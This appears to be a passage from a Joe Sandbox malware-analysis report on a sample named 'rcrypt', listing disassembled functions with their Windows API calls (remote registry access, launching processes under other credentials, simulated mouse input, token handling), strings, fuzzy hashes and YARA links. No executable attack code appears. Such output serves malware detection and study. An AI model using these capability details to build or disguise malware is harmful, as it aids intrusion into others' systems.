StringFromGUID2.OLE32(?,?,00000028), ref: 0014E167
SysAllocString.OLEAUT32(?), ref: 0014E175

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 163eba6f0ac67eb74cbac283c42b635e219d8326026cc7dfeb02deda80c0651e
Instruction ID: d74dea28847b1305dc477c4ef719b48fa3c3373e5fddf8727b518063c01e3e73
Opcode Fuzzy Hash: 163eba6f0ac67eb74cbac283c42b635e219d8326026cc7dfeb02deda80c0651e
Instruction Fuzzy Hash: F1214135644108AF9B149FA8DC89DAB77ECFB09B60B508139F919CB270DB70DC828B64

Function 0014B6AF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0014B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0014B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0014B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0014B742
_wcsstr.LIBCMT ref: 0014B74C

Strings

@U=u, xrefs: 0014B6E4, 0014B71C

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID: @U=u
API String ID: 3902887630-2594219639
Opcode ID: 376b9deccb619e38744e111f1ed05bfcbb6cace2d9252a4b9b0f454aa28b250b
Instruction ID: e29cfe7f3b471dbb1d4ace1aff2b41ee62248ff574047ad84d9c291ef9595329
Opcode Fuzzy Hash: 376b9deccb619e38744e111f1ed05bfcbb6cace2d9252a4b9b0f454aa28b250b
Instruction Fuzzy Hash: 1121FC71608204BBEB295B799C89E7B7BACDF49721F11403DFD09CA1B1EF61DC819660

Function 001497E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00149802

Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00149834
__itow.LIBCMT ref: 0014984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00149874
__itow.LIBCMT ref: 00149885

Strings

@U=u, xrefs: 00149802, 00149834, 00149874

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID: @U=u
API String ID: 2983881199-2594219639
Opcode ID: 33c6b703e40bf0ece515af1ca74cdc77032e0f57454e8d292713cecebd50ce60
Instruction ID: 4f9d5af8829ed508c3700d3862f8e0437bea05190199f833d45f2f6f0889c3bc
Opcode Fuzzy Hash: 33c6b703e40bf0ece515af1ca74cdc77032e0f57454e8d292713cecebd50ce60
Instruction Fuzzy Hash: CF219875B0020DABDB119A698C86EEF7BB9EF4A710F044039FA09DB2A1D7708D8597D1

Function 0017783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000F1D73
Part of subcall function 000F1D35: GetStockObject.GDI32(00000011), ref: 000F1D87
Part of subcall function 000F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000F1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001778A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001778AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001778B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001778C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001778D4

Strings

Msctls_Progress32, xrefs: 00177872

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 2600683450aaebbbe145f7dcf9d8204e51c5b28a87edbc1302ed18ef1c33459d
Instruction ID: a1e6a19de1c655cf6c89fef1042c3070e64739173ab3d20f5268fadb1268035c
Opcode Fuzzy Hash: 2600683450aaebbbe145f7dcf9d8204e51c5b28a87edbc1302ed18ef1c33459d
Instruction Fuzzy Hash: 301190B2154219BFEF159F60CC85EE77F6DEF08758F018114BA08A2090CB729C61DBA0

Function 001141C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00114292,?), ref: 001141E3
GetProcAddress.KERNEL32(00000000), ref: 001141EA
EncodePointer.KERNEL32(00000000), ref: 001141F6
DecodePointer.KERNEL32(00000001,00114292,?), ref: 00114213

Strings

combase.dll, xrefs: 001141DE
RoInitialize, xrefs: 001141D2

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 5b6b5694c68977bb093094f237601f2c526b2481c0f47df9c5bc066d17fb4b77
Instruction ID: a2ef5f2634d650bc005ddc572c367c93488d3c4d1bb4136183f984c92e2b3ef4
Opcode Fuzzy Hash: 5b6b5694c68977bb093094f237601f2c526b2481c0f47df9c5bc066d17fb4b77
Instruction Fuzzy Hash: E5E01AB4A90300AFEF207FB8EC09B453AE5BB20B02F508638F555D58A1DBB560D6CF00

Function 0011429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001141B8), ref: 001142B8
GetProcAddress.KERNEL32(00000000), ref: 001142BF
EncodePointer.KERNEL32(00000000), ref: 001142CA
DecodePointer.KERNEL32(001141B8), ref: 001142E5

Strings

RoUninitialize, xrefs: 001142A7
combase.dll, xrefs: 001142B3

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 7e4e425d1941df7eef9c4e056e163609559142b94283c892e4bdfb264269954d
Instruction ID: 49b3f410f6ab054de0143c7674f421a502135dd4e4784677d92642ed14d6e14f
Opcode Fuzzy Hash: 7e4e425d1941df7eef9c4e056e163609559142b94283c892e4bdfb264269954d
Instruction Fuzzy Hash: BEE0BF7C9813109BEB209B64FC0DF453AB4F714B42F108228F105E19A1CB7455C5CB14

Function 0015675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001568AD
_memmove.LIBCMT ref: 001567E8

Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C

_memmove.LIBCMT ref: 0015685B
_memmove.LIBCMT ref: 00156942
_memmove.LIBCMT ref: 0015695B
_memmove.LIBCMT ref: 00156977

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: ecd8279f8e72c8688cf3691b7744d89f1efaaf694fdcfa3f8cbe5a350d748cde
Instruction ID: 1a185bcdb39c1444ef95666478604f0daa1e10f05ae4e6ff8a66dc07a64b4057
Opcode Fuzzy Hash: ecd8279f8e72c8688cf3691b7744d89f1efaaf694fdcfa3f8cbe5a350d748cde
Instruction Fuzzy Hash: 5E61CD3090424AEBCF15EF64CC82FFE77A4AF08308F454419FE695B292DB30A849DB91

Function 0017046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

Part of subcall function 001710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00170038,?,?), ref: 001710BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00170548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00170588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 001705AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001705D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00170617
RegCloseKey.ADVAPI32(00000000), ref: 00170624

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 63134162d1c199b11fc37c2733bc5ed758cd65f61e0939167bbe93115321fe31
Instruction ID: 257e4691509b0785eef6c8d7d289fedc359225c0c3f265a2acacbf6847694bb5
Opcode Fuzzy Hash: 63134162d1c199b11fc37c2733bc5ed758cd65f61e0939167bbe93115321fe31
Instruction Fuzzy Hash: DD513631508304AFC715EB24C885EAFBBB9FF88314F04892DF649872A2DB31E945DB52

Function 00175A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00175A82
GetMenuItemCount.USER32(00000000), ref: 00175AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00175AE1
GetMenuItemID.USER32(?,?), ref: 00175B50
GetSubMenu.USER32(?,?), ref: 00175B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00175BAF

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 61b9e1eb7443804321b6b3481b0243984ac1e22eaa6880f41fd76650eb3915db
Instruction ID: b71ec5a52b7498a5fd734d5fc76dc8aae7abcefa8a91dfc1f2e8c86208848b74
Opcode Fuzzy Hash: 61b9e1eb7443804321b6b3481b0243984ac1e22eaa6880f41fd76650eb3915db
Instruction Fuzzy Hash: 2B518F35A00619EFCB15DF64C845AEEB7B6EF48310F108469F919BB351CBB0AE81CB90

Function 0014F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0014F3F7
VariantClear.OLEAUT32(00000013), ref: 0014F469
VariantClear.OLEAUT32(00000000), ref: 0014F4C4
_memmove.LIBCMT ref: 0014F4EE
VariantClear.OLEAUT32(?), ref: 0014F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0014F569

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 6f3473ef699f14586d8886a8a17ce95cc88d9defcea2c73eab13f88e52557289
Instruction ID: b0f9bcfa93efc5452ef4a72f376ac4c28d3a533f7f66bd5578f986b8f63d7675
Opcode Fuzzy Hash: 6f3473ef699f14586d8886a8a17ce95cc88d9defcea2c73eab13f88e52557289
Instruction Fuzzy Hash: 1E5136B5A00209AFCB14CF58D884AAAB7B8FF4C354F15856EE959DB311D730E952CBA0

Function 001526F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00152747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00152792
IsMenu.USER32(00000000), ref: 001527B2
CreatePopupMenu.USER32 ref: 001527E6
GetMenuItemCount.USER32(000000FF), ref: 00152844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00152875

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: cfb7fc454d36c52519a2effa29a0c1cc350076b3a058dd6d168c1dc067ea8aba
Instruction ID: 72f09d829d56f04e46662b9df9557df7edeca6c93d3e6704cc532e05f5a838ef
Opcode Fuzzy Hash: cfb7fc454d36c52519a2effa29a0c1cc350076b3a058dd6d168c1dc067ea8aba
Instruction Fuzzy Hash: A351C072A00309DFDF24CFA8D888AAEBBF5AF56315F104169EC359F290D7709948CB51

Function 000F1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 000F179A
GetWindowRect.USER32(?,?), ref: 000F17FE
ScreenToClient.USER32(?,?), ref: 000F181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000F182C
EndPaint.USER32(?,?), ref: 000F1876

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 4219f81163dd0b5aa18e8310a53eecc524cb3e098106bf06b910f768d22db894
Instruction ID: 9932bc396478b773977a1e7c2d38a2165bd76622f9ada49fc3faa244c359c419
Opcode Fuzzy Hash: 4219f81163dd0b5aa18e8310a53eecc524cb3e098106bf06b910f768d22db894
Instruction Fuzzy Hash: B641AE71104304EFD710DF24DC84BBA7BF8EB59724F140628FA98875A2CB359C86EB61

Function 001673B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00165134,?,?,00000000,00000001), ref: 001673BF

Part of subcall function 00163C94: GetWindowRect.USER32(?,?), ref: 00163CA7

GetDesktopWindow.USER32 ref: 001673E9
GetWindowRect.USER32(00000000), ref: 001673F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00167422

Part of subcall function 001554E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0015555E

GetCursorPos.USER32(?), ref: 0016744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001674AC

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: bfafcca1fca3c176ed9fc65ffb9480fc07271aaf0d136159f869761fc62523bc
Instruction ID: 5c506905e089d31e1f015fcb34c37ec665049488649b0137c4e5581af544a225
Opcode Fuzzy Hash: bfafcca1fca3c176ed9fc65ffb9480fc07271aaf0d136159f869761fc62523bc
Instruction Fuzzy Hash: 1231D272509305AFD720DF14DC49E9BBBAAFF88314F00091DF59897191DB30E959CB92

Function 00148D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001485F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00148608
Part of subcall function 001485F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00148612
Part of subcall function 001485F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00148621
Part of subcall function 001485F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00148628
Part of subcall function 001485F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0014863E

GetLengthSid.ADVAPI32(?,00000000,00148977), ref: 00148DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00148DB8
HeapAlloc.KERNEL32(00000000), ref: 00148DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00148DD8
GetProcessHeap.KERNEL32(00000000,00000000,00148977), ref: 00148DEC
HeapFree.KERNEL32(00000000), ref: 00148DF3

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 6e229a4e9d39f4a169e92c1980c800b6c40eec37700601e7c01d31f6ceb20ba7
Instruction ID: c67af6cd4d70be096eecfe8871e5276fc3c1d8cf82724968c0781e997ea5c2d0
Opcode Fuzzy Hash: 6e229a4e9d39f4a169e92c1980c800b6c40eec37700601e7c01d31f6ceb20ba7
Instruction Fuzzy Hash: A1119A31902A05EBDB149BA4CC09BBF7BBAEB55325F104029E849972A0DB329981DB60

Function 00148AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00148B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00148B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00148B40
CloseHandle.KERNEL32(00000004), ref: 00148B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00148B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00148B8E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 7b383a67a444d2572b5f477fec0e63cc7e82981fc6500c9fa81609c7bb4d7556
Instruction ID: 355b2d157dd59b7e73626e97b6d8b964f7fc8cad88004a03888d4b946002f4b1
Opcode Fuzzy Hash: 7b383a67a444d2572b5f477fec0e63cc7e82981fc6500c9fa81609c7bb4d7556
Instruction Fuzzy Hash: 7F1117B2501249AFDB018FA4ED49FDE7BB9FF08344F144169FA08A2160C7769DA1AB60

Function 0017C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 000F12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000F134D
Part of subcall function 000F12F3: SelectObject.GDI32(?,00000000), ref: 000F135C
Part of subcall function 000F12F3: BeginPath.GDI32(?), ref: 000F1373
Part of subcall function 000F12F3: SelectObject.GDI32(?,00000000), ref: 000F139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0017C1C4
LineTo.GDI32(00000000,00000003,?), ref: 0017C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0017C1E6
LineTo.GDI32(00000000,00000000,?), ref: 0017C1F6
EndPath.GDI32(00000000), ref: 0017C206
StrokePath.GDI32(00000000), ref: 0017C216

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 5c14423ac0c1184f19c4ec5192a200d6ee6b9f3acd019ddbe4b7b48f76316325
Instruction ID: 4c9caf443fd0f0a9f169c93205a64ab8b3b1a137b71d53db5516c3b140f2d7d7
Opcode Fuzzy Hash: 5c14423ac0c1184f19c4ec5192a200d6ee6b9f3acd019ddbe4b7b48f76316325
Instruction Fuzzy Hash: 3111097640010CBFDB119F90DC88EEA7FADEB08354F048025BA185A5A2C7719D95DBA0

Function 001103A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

